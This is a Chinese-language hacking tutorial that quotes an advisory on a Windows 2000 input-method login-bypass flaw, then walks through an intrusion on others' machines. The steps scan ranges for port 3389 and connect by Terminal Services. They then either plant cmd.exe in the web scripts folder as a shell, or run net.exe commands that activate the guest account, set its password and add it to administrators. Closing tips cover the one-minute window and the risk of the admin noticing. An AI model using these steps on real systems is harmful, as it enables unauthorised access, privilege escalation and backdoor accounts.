|
|
这是另一篇^^
我们先来看看,cnns的公告:
微软Windows 2000系列登录验证机制漏洞 (MS,缺陷)
涉及程序:
Windows 2000
描述:
微软Windows 2000系列登录验证机制漏洞
详细:
在登录界面将光标移至用户名输入框,按键盘上的Ctrl+Shift键,这时在缺省的安装状态下会出现输入法状态条,将鼠标移至输入法状态条点击鼠标右键,出现的对话框中选择帮助,选择操作指南或输入法入门(微软的拼音输入法和智能ABC没有这个选项),在出现的操作指南或输入法入门窗口中会出现几个按钮,关键是选项按钮。如果是未安装Service Pack 1或IE5.5的Windows2000系统,用鼠标左键点击选项按钮,在出现的对话框中选择主页,这时在已出现的帮助窗口的右侧会出现IE浏览器界面中的此页不可显示页面,其中有个检测网络设置的链接,点击它就会出现网络设置选项,你可以对网络设置甚至控制面板做任何修改。用鼠标左键点击选项按钮,在出现的对话框中选择Internet选项,你也可以对主页、连结,安全、高级选项等做任何修改。最为严重的是用鼠标右键点击选项按钮会出现一个对话框,选择跳至URL,这时会出现一个对话框,其中有一个跳至该URL输入框,在其中输入你想看到的路径比如C: 那么这时在已出现的帮助窗口的右侧会出现资源管理器C盘的界面显示,你这时已经是系统管理员权限可以对你看到的数据做任何的操作,这样你就绕过了Windows2000的登录验证机制!
如果安装了Service Pack 1或IE5.5的Windows2000系统,网络设置选项不可以执行,但Internet选项仍可执行。资源管理器界面仍可出现,通过路径输入,所有的文件夹中的文件和根目录下的文件都可看到但已不能直接对文件夹和文件进行操作,但我们仍可以用鼠标右键点击文件夹和文件选择进行删除,彻底删除(按着Shift键),重命名,和发送到软盘等操作甚至可以格式化磁盘!或者用鼠标右键点击空白处选择Web或缩略图察看方式,会对一些可以显示的文件造成泄密。还有我们还可以用鼠标右键点击资源管理器界面左上角的盘符或者任意文件夹或能看到任意的文件,在盘符和文件夹出现的对话框中选择共享,在单个文件出现的对话框中选择属性,你可以任意添加共享权限,比如Everyone,你可以选择完全控制选项,这样只要这台机器如果在网络你仍可以通过网络远程登录完全控制所有数据资料!就是说我们无论通过网络远程登录或者物理接近装有Windows2000系统的计算机,那么我们就可控制一切!
此漏洞存在于一切具有多种输入法的Windows2000系统中,经过这样不正常的操作,正常登录以后还会随机出现各种程序运行错误。暂时的解决方法为:控制面板中选择区域选项中的输入法区域选项,选中启用任务栏上指示器复选框,留下你最擅长的一种输入法其余的输入法全部删除,其中内码输入法一定要删除!因为下述方法对内码输入法无效,然后在任务栏上用鼠标左键点击输入法图标的笔型图标选择关闭输入法状态。
解决方案:
因为这些操作是通过调用输入法的帮助文件来进行的。您也可以通过删除或者重命名输入法的帮助文件来解决。Windows2000 帮助文件中输入法分别对应的是系统安装目录(例如:C:WINNT)中help文件夹中:
WINIME.CHM 输入法操作指南
WINSP.CHM 双拼输入法帮助
WINZM.CHM 郑码输入法帮助
WINPY.CHM 全拼输入法帮助
WINGB.CHM 内码输入法帮助
对于其它的的微软以及第三方输入法,也可能存在问题,建议用户根据测试步骤中的介绍自行检查。
下载补丁:
微软于2000年9月29日发布了新的安全公告 MS00-069:
该网址不再展示
并提供了补丁程序下载地址,
简体中文Windows 2000 : 该网址不再展示
英文版Windows 2000 : 该网址不再展示
我们推荐使用Windows 2000系统的用户尽快下载并安装相应的补丁。
看完cnns的公告后,是不是觉得这个漏洞很恐怖?
事实上也如此。
接着,让我们来看看怎样利用此漏洞入侵。
本次范例需要的系统及程序情况如下:
操作系统:Windows98
对方操作系统:Windows 2000
程序(一):终端服务客户端
程序(二):superscan 3.0
本机IP:127.0.0.1
测试IP:127.0.0.14
新程序说明:
“终端服务客户端”是微软为管理员制作的一个远程管理软件。利用它可以远程管理服务器,操作如同在本地一样。(连接端口:3389)
1、首先,我们打开superscan。
设置:
IP:(需要扫描的IP地址。)
Start:127.0.0.1
Stop:127.0.0.255
Scan Type:(扫描类型设置。)
All ports from:3389|3389
然后,点击“Start”,开始扫描。
2、点击“Prune”,把多余的主机删除。然后把剩下的主机的IP地址记下来。(假设,我们扫描到:127.0.0.14。)
3、打开“终端服务客户端”,设置。
服务器:127.0.0.14
其他默认。
点击“连接”,完成。
4、过了一会,Windows2000的登陆界面就出来了。(如果发现是英文或繁体中文版,就放弃。)
5、用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。
方法(一):
1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)
2、按右键,选择“跳转到URL”,输入:c:winntsystem32cmd.exe
3、选择“保存到磁盘”。
4、选择目录:c:inetpubscripts
5、打开IE,输入:该网址不再展示
现在,我们制作了一个shell(cmd.exe)。(关于如何利用,请看“unicode漏洞”篇。)
方法(二):
1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞)
2、按右键,选择“跳转到URL”,输入:c:winntsystem32 (system32为系统目录,不同的主机,系统目录的位置也不同。)
3、在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式。
4、右键点击该快捷方式,在“属性” —— “目标”—— c:winntsystem32net.exe 后面空一格,填入“user guest /active :yes”。
5、点击“确定”。
说明:这一步骤目的是,利用“net.exe”激活被禁止使用的guest账户。
6、运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)
7、重复第4-6步。(其中,在“属性” —— “目标”—— c:winntsystem32net.exe 后面空一格,填入“user guest 密码”。)
说明:这一步骤目的是,利用“net.exe”激活guest账户的密码。
8、重复第4-6步。(其中,在“属性” —— “目标”—— c:winntsystem32net.exe 后面空一格,填入“localgroup administrators guest /add“)
说明:这一步骤目的是,利用“net.exe”将guest变成系统管理员。
9、再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。
现在,我们可以像操作本地主机一样,控制对方系统。
注意事项:
1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id及你的IP和主机名。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间。在这一分钟内如果你不能完成上述操作,你只能再连接。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
|
|
|
|